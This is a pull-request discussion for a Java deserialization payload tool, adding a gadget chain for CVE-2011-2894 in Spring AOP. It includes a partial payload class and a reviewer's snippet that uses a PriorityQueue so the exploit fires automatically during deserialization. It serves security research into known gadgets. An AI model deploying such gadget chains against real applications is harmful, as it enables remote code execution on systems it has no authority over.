### PR TITLE
Add the payload for CVE-2011-2894 (Spring AOP)

### PR DESCRIPTION
**Pull request by h3xstream**
I'm analyzing the various known gadgets. I decide to integrate this "old" payload created by @pwntester. It could be useful for others researcher to include it to the collections.

`Reflections.setFieldValue()` was changed to set field to the first **class** or **subclass**.

The payload is not added to the test suite because it require a version change in the `pom.xml`.

I have added some utility to display the state of a Java object before and after serialisation.

### CODE REVIEW

**Comment by frohoff** [comment]
This is great! Unfortunately we my need to figure out a solution for #10 before we can accept this as-is. I presume this causes a compilation error with the current spring version(s)?

File: src/main/java/ysoserial/payloads/SpringAop.java [hunk 1]
```diff
@@ -0,0 +1,146 @@
...
+ *
+ * http://www.pwntester.com/blog/2013/12/16/cve-2011-2894-deserialization-spring-rce/
+ */
+@SuppressWarnings({"restriction", "rawtypes"})
+@Dependencies({"org.springframework:spring-core:3.0.5.RELEASE","org.springframework:spring-beans:3.0.5.RELEASE","org.springframework:spring-aop:3.0.5.RELEASE"})
+public class SpringAop extends PayloadRunner implements ObjectPayload<Object> {
+
+    private static boolean DEBUG = false;
+
+    public Object getObject(final String command) throws Exception {
```
Comment (frohoff) [inline src/main/java/ysoserial/payloads/SpringAop.java]: Codacy Issue found: [The method getObject() has an NPath complexity of 2048](https://www.codacy.com/app/frohoff/ysoserial/file/2167879647/issues/source?bid=3161887&fileBranchId=3161888#l41)

File: src/main/java/ysoserial/payloads/util/PrintUtil.java [hunk 2]
```diff
@@ -0,0 +1,86 @@
+package ysoserial.payloads.util;
+
+import java.io.Serializable;
+import java.lang.reflect.Array;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
```
Comment (frohoff) [inline src/main/java/ysoserial/payloads/util/PrintUtil.java]: Codacy Issue found: [Avoid unused imports such as 'java.lang.reflect.Method'](https://www.codacy.com/app/frohoff/ysoserial/file/2167879652/issues/source?bid=3161887&fileBranchId=3161888#l6)

File: src/main/java/ysoserial/payloads/SpringAop.java (hunk 1 above)
Comment (frohoff) [inline src/main/java/ysoserial/payloads/SpringAop.java]: Codacy Issue found: [The method getObject() has an NPath complexity of 2048](https://www.codacy.com/app/frohoff/ysoserial/file/2167879647/issues/source?bid=3161887&fileBranchId=3161888#l41)

File: src/main/java/ysoserial/payloads/util/PrintUtil.java (hunk 2 above)
Comment (frohoff) [inline src/main/java/ysoserial/payloads/util/PrintUtil.java]: Codacy Issue found: [Avoid unused imports such as 'java.lang.reflect.Method'](https://www.codacy.com/app/frohoff/ysoserial/file/2167879652/issues/source?bid=3161887&fileBranchId=3161888#l6)

**Comment by pwntester** [comment]
@h3xstream, Thanks for adding my exploit, really cool! 

Just one note, I saw you are just returning the proxy and then modifying PayloadRunner.java to call `toString()` in the deserialized proxy. This should not be necessary, just use a trigger gadget to dispatch the call to the invocation handler during deserialization:

```
Comparator proxy = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);

PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, proxy);
Object[] queue = new Object[] {templates, templates};
Reflections.setFieldValue(priorityQueue, "queue", queue);
Reflections.setFieldValue(priorityQueue, "size", 2);

return priorityQueue;
```

**Comment by frohoff** [comment]
It looks like this compiles OK against Spring 4.x. Can you update with @pwntester's suggested changes and rebase against the latest master to resolve conflicts? If so I'll try to get this pulled in soon and add support for dynamic dependency loading at payload generation time.

**Comment by h3xstream** [comment]
@frohoff This gadget does compile with 4.1.4 but the payload will not be generated.
The "powerful" classes used in this gadget are no longer serializable in 4.1.4.

pwntester additional trick is to avoid the need of manual interaction with the Proxy. The PriorityQueue will trigger the compareTo() call during the deserialization making the gadget "plug-n-play" for all applications. (I just introduce the code snippet in cf6d4e25fe52439de8904338808045b738c49d13)

**Pull request closed without merging**